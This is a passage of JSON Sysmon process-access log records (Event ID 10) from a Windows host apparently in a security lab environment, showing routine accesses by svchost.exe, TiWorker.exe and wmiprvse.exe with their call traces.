C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.237","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010018A0200}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1113,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.299\r\nSourceProcessGUID: {41C8662E-1F69-5F25-0000-0010018A0200}\r\nSourceProcessId: 3016\r\nSourceThreadId: 3068\r\nSourceImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010EE870200}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.299","SourceProcessGUID":"{41C8662E-1F69-5F25-0000-0010018A0200}","SourceProcessId":"3016","SourceThreadId":"3068","SourceImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010EE870200}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1114,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.299\r\nSourceProcessGUID: {41C8662E-1F69-5F25-0000-0010018A0200}\r\nSourceProcessId: 3016\r\nSourceThreadId: 3068\r\nSourceImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010EE870200}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.299","SourceProcessGUID":"{41C8662E-1F69-5F25-0000-0010018A0200}","SourceProcessId":"3016","SourceThreadId":"3068","SourceImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010EE870200}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1115,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1116,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1117,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1118,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1119,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\